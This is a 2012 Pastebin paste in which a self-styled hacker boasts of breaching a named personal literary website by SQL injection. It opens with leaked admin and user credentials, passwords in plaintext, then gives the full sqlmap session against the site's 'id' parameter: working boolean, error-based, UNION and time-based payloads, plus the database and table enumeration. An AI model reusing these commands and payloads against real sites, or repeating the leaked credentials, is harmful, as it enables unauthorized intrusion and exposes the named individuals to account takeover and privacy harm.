Advertisement
Islam-Hacker

Greeting to Saudi Team-3) 7-9-2012

Sep 7th, 2012
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.29 KB | None | 0 0
  1. Greeting to Saudi Team ;)
  2. Published by JM511 ;)
  3. From Saudi Arabia
  4. BBM;21EB3DBB
  5. =============================
  6.  
  7. titol de prova de l'index
  8.  
  9. Table: usuaris
  10. [2 entries]
  11. +--------------+----+-----------------------+---------+
  12. | contrassenya | id | nom | usuari |
  13. +--------------+----+-----------------------+---------+
  14. | vsunyol | 2 | Victor Sunyol | vsunyol |
  15. | terminal151 | 1 | Adri\e0 Colomer Serra | admin |
  16. +--------------+----+-----------------------+---------+
  17. jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://www.victorsunyol.net/altresTextos.php?id=3 --dbs
  18.  
  19. sqlmap/0.9 - automatic SQL injection and database takeover tool
  20. http://sqlmap.sourceforge.net
  21.  
  22. [*] starting at: 22:17:58
  23.  
  24. [22:17:58] [INFO] using '/home/jm511/.sqlmap/output/www.victorsunyol.net/session' as session file
  25. [22:17:58] [INFO] testing connection to the target url
  26. [22:17:59] [INFO] testing if the url is stable, wait a few seconds
  27. [22:18:01] [INFO] url is stable
  28. [22:18:01] [INFO] testing if GET parameter 'id' is dynamic
  29. [22:18:01] [INFO] confirming that GET parameter 'id' is dynamic
  30. [22:18:02] [INFO] GET parameter 'id' is dynamic
  31. [22:18:02] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
  32. [22:18:02] [INFO] testing sql injection on GET parameter 'id'
  33. [22:18:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  34. [22:18:04] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  35. [22:18:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  36. [22:18:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
  37. [22:18:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  38. [22:18:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  39. [22:18:16] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
  40. [22:18:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  41. [22:18:19] [INFO] target url appears to be UNION injectable with 6 columns
  42. [22:18:23] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
  43. GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
  44. sqlmap identified the following injection points with a total of 28 HTTP(s) requests:
  45. ---
  46. Place: GET
  47. Parameter: id
  48. Type: boolean-based blind
  49. Title: AND boolean-based blind - WHERE or HAVING clause
  50. Payload: id=3 AND 7235=7235
  51.  
  52. Type: error-based
  53. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  54. Payload: id=3 AND (SELECT 1505 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,120,114,58),(SELECT (CASE WHEN (1505=1505) THEN 1 ELSE 0 END)),CHAR(58,106,100,112,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  55.  
  56. Type: UNION query
  57. Title: MySQL UNION query (NULL) - 1 to 10 columns
  58. Payload: id=-5793 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,112,120,114,58),IFNULL(CAST(CHAR(81,106,121,104,67,79,85,66,111,107) AS CHAR),CHAR(32)),CHAR(58,106,100,112,58)), NULL, NULL, NULL#
  59.  
  60. Type: AND/OR time-based blind
  61. Title: MySQL > 5.0.11 AND time-based blind
  62. Payload: id=3 AND SLEEP(5)
  63. ---
  64.  
  65. [22:19:41] [INFO] the back-end DBMS is MySQL
  66.  
  67. web application technology: Apache 2.2.13
  68. back-end DBMS: MySQL 5.0
  69. [22:19:41] [INFO] fetching database names
  70. [22:19:42] [INFO] the SQL query used returns 2 entries
  71. available databases [2]:
  72. [*] information_schema
  73. [*] vsunyol
  74.  
  75. [22:19:43] [INFO] Fetched data logged to text files under '/home/jm511/.sqlmap/output/www.victorsunyol.net'
  76.  
  77. [*] shutting down at: 22:19:43
  78.  
  79. jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://www.victorsunyol.net/altresTextos.php?id=3 -D vsunyol --tables
  80.  
  81. sqlmap/0.9 - automatic SQL injection and database takeover tool
  82. http://sqlmap.sourceforge.net
  83.  
  84. [*] starting at: 22:19:53
  85.  
  86. [22:19:53] [INFO] using '/home/jm511/.sqlmap/output/www.victorsunyol.net/session' as session file
  87. [22:19:53] [INFO] resuming injection data from session file
  88. [22:19:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  89. [22:19:53] [INFO] testing connection to the target url
  90. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  91. ---
  92. Place: GET
  93. Parameter: id
  94. Type: boolean-based blind
  95. Title: AND boolean-based blind - WHERE or HAVING clause
  96. Payload: id=3 AND 7235=7235
  97.  
  98. Type: error-based
  99. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  100. Payload: id=3 AND (SELECT 1505 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,120,114,58),(SELECT (CASE WHEN (1505=1505) THEN 1 ELSE 0 END)),CHAR(58,106,100,112,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  101.  
  102. Type: UNION query
  103. Title: MySQL UNION query (NULL) - 1 to 10 columns
  104. Payload: id=-5793 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,112,120,114,58),IFNULL(CAST(CHAR(81,106,121,104,67,79,85,66,111,107) AS CHAR),CHAR(32)),CHAR(58,106,100,112,58)), NULL, NULL, NULL#
  105.  
  106. Type: AND/OR time-based blind
  107. Title: MySQL > 5.0.11 AND time-based blind
  108. Payload: id=3 AND SLEEP(5)
  109. ---
  110.  
  111. [22:19:54] [INFO] the back-end DBMS is MySQL
  112.  
  113. web application technology: Apache 2.2.13
  114. back-end DBMS: MySQL 5.0
  115. [22:19:54] [INFO] fetching tables for database 'vsunyol'
  116. [22:19:55] [INFO] the SQL query used returns 23 entries
  117. Database: vsunyol
  118. [23 tables]
  119. +-------------------------+
  120. | altresobres |
  121. | altrestextos |
  122. | artistesvisuals |
  123. | audio |
  124. | dadesbiografiques |
  125. | entrevistes |
  126. | idiomes |
  127. | imgaltresobres |
  128. | imgartistesvisuals |
  129. | imgdadesbiografiques |
  130. | imgobratraduida |
  131. | imgobres |
  132. | imgtraduccions |
  133. | links |
  134. | obratraduida |
  135. | obres |
  136. | selecciodepoemes |
  137. | taltresobres |
  138. | tartistesvisuals |
  139. | textoscriticssobrelobra |
  140. | textossobrepoesia |
  141. | traduccions |
  142. | usuaris |
  143. +-------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement